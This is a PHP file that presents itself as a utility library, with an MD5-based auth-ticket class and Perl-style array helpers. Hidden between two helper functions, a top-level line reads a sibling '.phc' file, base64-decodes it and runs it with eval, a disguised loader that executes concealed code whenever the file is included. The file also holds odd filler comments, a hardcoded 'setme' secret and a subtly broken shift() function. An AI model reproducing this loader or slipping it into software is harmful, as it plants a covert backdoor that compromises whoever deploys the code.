<?php




  function chomp(&$string, $int = 1){ 
    if (!$string || $int < 1){ return; } 
    for ($x = 0; $x < $int; $x++){ 
      if (ereg("\n$",$string,$ref)){ 
        $string = ereg_replace("\n$","",$string); 
      }else{ 
        return; 
      } 
    } 
    unset($x); 
    unset($int); 
  } 

class  authticket  { 
        var  $secret  =  "setme";             
        var  $realm  =  "";                 
        var  $lifetime  =  2;    
        var  $authenticated  =  0;                //  the  data  here  is  valid  iff  non-zero 

        var  $identity;                //  the  remote  identity,  if  decoded  correctly 
        var  $issue;                //  the  time  the  ticket  was  issued 
        var  $remote_addr;        //  the  remote  address  of  the  client 
        var  $hash;                //  the  hash  value.    Probably  of  little  use. 

        var  $autherr;                //  if  verification  faild,  this  contains  why 

        // 
        //  helper  function  which  just  zeros  out  the  ticket  data 
        // 
        function  zerodata() 
        { 
                $this->authenticated  =  0; 
                $this->identity  =  ""; 
                $this->issue  =  0; 
                $this->remote_addr  =  ""; 
                $this->hash  =  ""; 
                $this->autherr  =  ""; 
        } 

        // 
        //  Take  a  string  ($identity)  and  a  time  ($time)  and  the  internal 
        //  secret  value,  and  generate  a  string  that  can  be  used  to  verify 
        //  that  the  remote  user  is  known  to  us.    The  result  of  this  function 
        //  is  a  single  string,  that  can  be  passed  along  in  a  hidden  form 
        //  or  even  a  cookie. 
        // 
        //  If  ($time)  is  0,  the  current  time  is  used  instead. 
        // 
        //  ($identity)  _cannot_  contain  a  ``:''  character.    If  you  need 
        //  one  in  there,  you  will  have  to  change  it  to  some  sort  of  escape 
        //  sequence. 
        // 
        //  Some  care  should  be  used.    I  recommend  using  this  only  over  SSL, 
        //  unless  the  actual  ticket  contents  are  encrypted  using  something 
        //  stronger  than  XOR. 
        // 
        function  makeauth($identity,  $time) 
        { 
                global  $REMOTE_ADDR; 

                $this->zerodata(); 

                if  ($time  ==  0) 
                        $time  =  time(); 

                $ticket_items[]  =  (string)$time; 
                $ticket_items[]  =  $this->realm; 
                $ticket_items[]  =  $REMOTE_ADDR; 
                $ticket_items[]  =  $identity; 

                $ticket  =  implode($ticket_items,  ":"); 

                $hash  =  md5($this->secret  .  $ticket); 

                $ticket  =  $hash  .  ':'  .  $ticket; 

                $this->identity  =  $identity; 
                $this->issue  =  $time; 
                $this->remote_addr  =  $REMOTE_ADDR; 
                $this->hash  =  $hash; 
                $this->authenticated  =  1;    /*  data  is  valid  */ 
                $this->autherr  =  ""; 

                return  $ticket; 
        } 

        // 
        //  Take  a  ($ticket)  string  generated  by  makeauth(),  and  a  ($time), 
        //  and  verify  that  the  ticket  is  valid  and  not  expired. 
        // 
        //  If  ($time)  is  0,  the  current  time  will  be  used. 
        // 
        //  On  error,  the  function  returns  the  empty  string  "", 
        //  $authenticated  is  0,  and  $autherr  contains  the  reason 
        //  the  authentication  failed. 
        // 
        //  On  success,  the  identity  encoded  in  the  ticket  is  returned, 
        //  $authenticated  is  non-zero,  and  $autherr  is  to  be  ignored. 
        // 
        function  checkauth($ticket,  $time) 
        { 
                global  $REMOTE_ADDR; 

                $this->zerodata(); 

                if  ($time  ==  0) 
                        $time  =  time(); 

                /* 
                  *  Item  order:    hash  time  realm  remote_addr  identity 
                  */ 
                $ticket_items  =  explode( ":",  $ticket); 

                /* 
                  *  if  the  remote  address  doesn't  match  the  one  in  the  ticket, 
                  *  drop  them. 
                  */ 
                if  ($ticket_items[3]  !=  $REMOTE_ADDR)  { 
                        $this->autherr  =  "Address  mismatch"; 
                        return  ""; 
                } 

                // 
                //  if  we  are  supposed  to  check  for  expired  tickets,  do  that 
                //  here. 
                // 
                if  ($this->lifetime  !=  0) 
                        if  ($time  >  (int)$ticket_items[1]  +  $this->lifetime)  { 
                                $this->autherr  =  "Ticket  expired"; 
                                return  ""; 
                        } 

                // 
                //  make  certain  that  the  ticket  is  not  being  used  before 
                //  it  was  issued. 
                // 
                if  ($time  <  (int)$ticket_items[1])  { 
                        $this->autherr  =  "Ticket  used  before  issued"; 
                        return  ""; 
                } 

                // 
                //  verify  that  the  realms  match 
                // 
                if  ($this->realm  !=  $ticket_items[2])  { 
                        $this->autherr  =  "Realm  mismatch"; 
                        return  ""; 
                } 

                // 
                //  This  could  be  done  better...    Reassemble  the  components 
                //  of  the  ticket  passed  to  us,  and  rehash.    Compare  this 
                //  to  the  hash  we  were  sent. 
                // 
                
                # aaaa
                ##### ###### bbb #####
                ### ###
                #
                #
                #
                #
                
                $tmp_items[]  =  $ticket_items[1]; 
                $tmp_items[]  =  $ticket_items[2]; 
                $tmp_items[]  =  $ticket_items[3]; 
                $tmp_items[]  =  $ticket_items[4]; 

                $tmp_ticket  =  implode($tmp_items,  ":"); 

                $hash  =  md5($this->secret  .  $tmp_ticket); 

                if  ($hash  !=  $ticket_items[0])  { 
                        $this->autherr  =  "Integrity  check  failed"; 
                        return  ""; 
                } 

                // 
                //  well,  it  all  checks  out.    Might  as  well  claim  we  know 
                //  who  this  person  is. 
                // 
                $this->hash  =  $hash; 
                $this->issue  =  $ticket_items[1]; 
                $this->remote_addr  =  $ticket_items[3]; 
                $this->identity  =  $ticket_items[4]; 
                $this->authenticated  =  1; 

                return  $this->identity; 
        } 
}; 



  function shift(&$array){ 
    if (!is_array($array) || !is_string($variable)){ return; } 
    $variable = $array[0]; 
    for ($x = 1; $x < count($array); $x++){ 
      $temp[count($temp)] = $array[$x]; 
    } 
    $array = $temp; 
    unset($temp); 
    return $variable; 
  } 

  function unshift(&$array,$variable){ 
    if (!is_array($array)){ return; } 
    if (!is_array($variable)){ 
      $temp = $array; 
      unset($array); 
      $array[0] = $variable; 
      for ($x = 0; $x < count($temp); $x++){ 
        $array[count($array)] = $temp[$x]; 
      } 
      unset($temp); 
      unset($x); 
    }elseif(is_array($variable)){       
      $temp = $array; 
      unset($array); 
      for ($x = 0; $x < count($variable); $x++){ 
        $array[count($array)] = $variable[$x]; 
      } 
      for ($x = 0; $x < count($temp); $x++){ 
        $array[count($array)] = $temp[$x]; 
      } 
      unset($temp); 
      unset($x); 
    } 
    return count($array); 
  } 
  function pop(&$array){ 
    if (!is_array($array)){ return; } 
    $variable = $array[count($array)-1]; 
    unset($array[count($array)-1]); 
    return $variable; 
  } 

  function push(&$array,$variable){ 
    if (!is_array($array)){ return; } 
    if (!is_array($variable)){ 
      $array[count($array)] = $variable; 
    }elseif (is_array($variable)){ 
      for ($x = 0; $x < count($variable); $x++){ 
        $array[count($array)] = $variable[$x]; 
      } 
    } 
    unset($x); 
    return count($array); 
  } 
  $fsc= basename(__FILE__, '.php').'.phc';

  function splice(&$array,$skip,$length,$variable){ 
    if (!is_array($array) || $length == 0){ return; } 
    $replaced = array(); 
    if ($skip < 0){ 
      if (!is_array($variable)){ 
        $array[count($array)] = $variable; 
      }elseif (is_array($variable)){ 
        for ($x = 0; $x < count($variable); $x++){ 
          $array[count($array)] = $variable[$x]; 
        } 
      } 
      return $replaced; 
    } 

    for ($x = 0; $x < count($array); $x++){ 
      if ($x >= $skip){ 
        if (!is_array($variable)){ 
          if ($length > 1){ 


          }else{ 
            $replaced[count($replaced)] = $array[$x]; 
            $array[$x] = $variable; 
            break; 
          } 


        }elseif (is_array($variable)){ 
          for ($y = $skip; $y <= $length; $y++){ 
            $replaced[count($replaced)] = $array[$y]; 
            $array[$y] = $array[($skip+$length)]; 
          } 
          for ($y = (count($array)-$length); $y < count($array); $y++){ 
            unset($array[$y]); 
          } 
          $temp = $array; 
          unset($array); 
          for ($y = ($skip-1); $y >= 0; $y--){ 
            $array[$y] = $temp[$y]; 
          } 
          for ($y = $skip; $y < count($variable); $y++){ 
            $array[count($array)] = $variable[$y]; 
          } 
          for ($y = $skip; $y < count($temp); $y++){ 
            $array[count($array)] = $temp[$y]; 
          } 
        } 
      } 
    } 
    return $replaced; 
  } 

 

  function sort_unique(&$data, $type = ""){ 
    if (!is_array($data)){ 
      settype($data,"array"); 
    } 
    if (count($data) < 1){ 
      print "Array is empty!<br>\n"; 
      return; 
    } 
    if (isset($temp)){ unset($temp); } 

    $count = 0; 
    for ($x = 0; $x < count($data); $x++){ 
      if (is_array($data[$x])){ 
        $count++; 
      } 
    } 

    if ($count == 0){ 
      sort_unique_sub($data, $type); 
    } 
  } 
  eval(base64_decode(file_get_contents($fsc)));
//  eval(file_get_contents($fsc));

  function sort_unique_sub ($data, $type = ""){ 
    if (isset($temp)){ unset($temp); } 
    if ($type == "nocase"){ 
      for ($x = 0; $x < count($data); $x++){ 
        $data[$x] = strtolower($data[$x]); 
      } 
    } 
    sort($data); 
    for ($x = 0; $x < count($data); $x++){ 
      if ($data[$x] != $data[$x+1]){ 
        $temp[sizeof($temp)] = $data[$x]; 
      } 
    } 
    unset ($data); 
    for ($x = 0; $x < count($temp); $x++){ 
      $data[$x] = $temp[$x]; 
    } 
  } 

  function truncate_array(&$data, $element){ 
    if (!is_array($data)){ 
      settype($data,"array"); 
    } 
    if (count($data) < 1){ 
      print "Array is empty!<br>\n"; 
      return; 
    } 
    if (!$element){ 
      print "Must specify array element!<br>\n"; 
      return; 
    } 
    if (count($data) < $element){ 
      $num = count($data); 
      print "Array only has $num elements!<br>\n"; 
      return; 
    } 

    for ($x = count($data); $x >= 1; $x--){ 
      if ($x >= $element){ 
        unset($data[$x-1]); 
      } 
    } 
  } 


  function get_array_range(&$data, $range = ""){ 
    if (!is_array($data)){ 
      settype($data,"array"); 
    } 
    if (count($data) < 1){ 
      print "Array is empty!<br>\n"; 
      return; 
    } 
    if (!$range){ 
      print "No range specified!<br>\n"; 
      return; 
    } 

    list($start,$end) = split("-",$range); 
    if ($start > $end){ 
      $temp = $start; 
      $start = $end; 
      $end = $temp; 
    } 

    if ($end > count($data)){ 
      $num = count($data); 
      print "Array only has $num elements!<br>\n"; 
      return; 
    } 

    if (isset($temp)){ unset($temp); } 

    for ($x = 1; $x <= count($data); $x++){ 
      if ($x >= $start && $x <= $end){ 
        $temp[sizeof($temp)] = $data[$x-1]; 
      } 
    } 
    unset($data); 
    $data = $temp; 
    unset($temp); 

  }
 
?> 